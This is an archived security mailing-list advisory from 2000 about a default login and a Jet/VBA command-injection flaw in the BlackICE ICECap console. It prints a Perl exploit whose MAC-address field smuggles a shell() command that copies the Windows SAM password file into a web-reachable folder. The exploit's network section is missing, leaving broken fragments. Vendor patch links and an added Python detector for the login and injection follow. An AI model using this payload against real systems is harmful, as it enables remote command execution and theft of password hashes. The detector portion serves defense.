Subject: [EXPL] Mining BlackICE with RFPickAxe
Date: Thu, 18 May 2000 07:30:17 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Mining BlackICE with RFPickAxe
--------------------------------------------------------------------------------

SUMMARY

The BlackICE IDS uses a management console called ICECap to collect and monitor alerts sent by the various installed BlackICE agents. The ICECap user console listens on port 8081 (with an included HTTP server), and alerts are pushed to another server listening on port 8082.

The first problem is that the software uses a default login of 'iceman' with no password. This means we can log onto the console on port 8081, or push alerts to it on port 8082.

The second problem is that the software uses, by default, the Microsoft Jet 3.5 engine to store alerts. If you couple that with the VBA shell problem, you can push alerts whose fields contain commands, and those commands will be executed by the ICECap system.

DETAILS

Exploit:

#!/usr/bin/perl
#
# RFPickaxe.pl - demo exploit for default ICECap login/alerts
# Disclaimer: I do not provide technical support for my exploits!
#
# Sorry, this requires Unix, due to the `date` call

$|=1;
use Socket;

###############################################################
# IP of ICECap system (assumes port 8082)
$Target="10.10.200.4";

# account info - uses default 'iceman' w/ no password
$account="iceman";
$httpauth="aWNlbWFuOiUzQjclQzYlRkU=";

#-------- attributes of the alert ----------
$id="100005";
$issue_name="Exploit";
$sev="1";

# spoof these
$target="0.0.0.8";
$target_dns="some.host.com";
$det_ip="0.0.0.8";
$det_nbn="SENSOR";
$int_ip="255.255.255.255";
$param="Pickaxe";

# either fake the MAC, or use it to run commands via JET vulnerability
#$det_mac="0000000000000";
$det_mac="|shell(\"cmd /c copy c:\\winnt\\repair\\sam._ ".
         "c:\\progra~1\\networ~1\\icecap\\spatch\\en\\sam.exe \")|";
##############################################################

$inet=inet_aton($Target);

$time=`date -u "+%Y-%m-%d %T"`;
$time=~s/ /%20/g;
$time=~s/:/%3a/g;

# path is \program files\network ice\icecap\spatch\en
$alert="accountName=$account&issueID=$id&issueName=$issue_name".
       "&severity=$sev&targetNetAddress=$target&targetDNSName=".
       "$target_dns&detectorNetAddress=$det_ip&detectorNetBIOS".
       "Name=$det_nbn&detectorMacAddress=$det_mac&".
       "intruderNetAddress=$int_ip&detectorType=3&startTime=".
       "$time&parameter=$param\r\n";
$len=length($alert);

@DXX=();

# NOTE: the socket-connect and HTTP POST section of the original script is
# missing from the archived copy; only the tail of the eval block survives.
$send=<;
select(STDOUT);
close(S);
alarm(0);
return;
} else { die("not responding"); }
alarm(0);};
if ($@) { if ($@ =~ /timeout/){ die("Timed out!\n");}}}

Solution:

NetworkICE has released ICEcap v2.0.23a, as well as some supporting KB articles detailing the problem.

ICEcap 2.0.23a: http://advice.networkice.com/advice/Support/KB/q000167/
Jet bug: http://advice.networkice.com/advice/Support/KB/q000164/
Easy injection bug: http://advice.networkice.com/advice/Support/KB/q000166/

ADDITIONAL INFORMATION

The information has been provided by: rain forest puppy.

========================================
DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
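As an added example (not part of the advisory or of NetworkICE's software), the following Python script shows how a proxy or log-review tool in front of the port 8082 alert receiver could flag the two conditions described above: an Authorization header carrying the factory 'iceman' account with an empty password, and alert field values that carry a Jet/VBA expression such as |shell(...)| instead of the 12-hex-digit MAC the detectorMacAddress field should hold. The field names come from the advisory's POST body; the sample requests are constructed.

```python
import base64
import re
from urllib.parse import parse_qs

# Field names an ICECap alert carries (taken from the advisory's POST body).
EXPECTED_FIELDS = {
    "accountName", "issueID", "issueName", "severity", "targetNetAddress",
    "targetDNSName", "detectorNetAddress", "detectorNetBIOSName",
    "detectorMacAddress", "intruderNetAddress", "detectorType",
    "startTime", "parameter",
}
MAC_RE = re.compile(r"^[0-9A-Fa-f]{12}$")          # plain 12-hex-digit MAC
JET_EXPR_RE = re.compile(r"\|.*\bshell\s*\(", re.I)  # |...shell(...| Jet/VBA marker

def check_auth(auth_header):
    """Return findings for the HTTP basic-auth header of an alert push."""
    if not auth_header.lower().startswith("basic "):
        return ["missing HTTP basic auth"]
    try:
        user, _, pw = base64.b64decode(auth_header[6:]).decode().partition(":")
    except Exception:
        return ["undecodable Authorization header"]
    if user == "iceman" and pw == "":
        return ["default account 'iceman' with empty password"]
    return []

def check_alert(body):
    """Return findings for one URL-encoded alert body (empty list = clean)."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    findings = []
    for name, value in fields.items():
        if name not in EXPECTED_FIELDS:
            findings.append(f"unexpected field {name}")
        if JET_EXPR_RE.search(value):
            findings.append(f"Jet shell() expression in {name}")
    if not MAC_RE.match(fields.get("detectorMacAddress", "")):
        findings.append("detectorMacAddress is not 12 hex digits")
    return findings

# Constructed sample bodies: a well-formed alert and one carrying an injected expression.
BENIGN_ALERT = (
    "accountName=iceman&issueID=100005&issueName=Exploit&severity=1"
    "&targetNetAddress=0.0.0.8&targetDNSName=some.host.com&detectorNetAddress=0.0.0.8"
    "&detectorNetBIOSName=SENSOR&detectorMacAddress=00A0C9123456"
    "&intruderNetAddress=255.255.255.255&detectorType=3"
    "&startTime=2000-05-18%2007:30:17&parameter=Pickaxe"
)
INJECTED_ALERT = BENIGN_ALERT.replace(
    "detectorMacAddress=00A0C9123456",
    "detectorMacAddress=|shell(%22cmd%20/c%20echo%20hi%22)|")
```

Both checks are cheap enough to run inline on every push; a non-empty result is the signal to drop the alert and raise an alarm on the sending address.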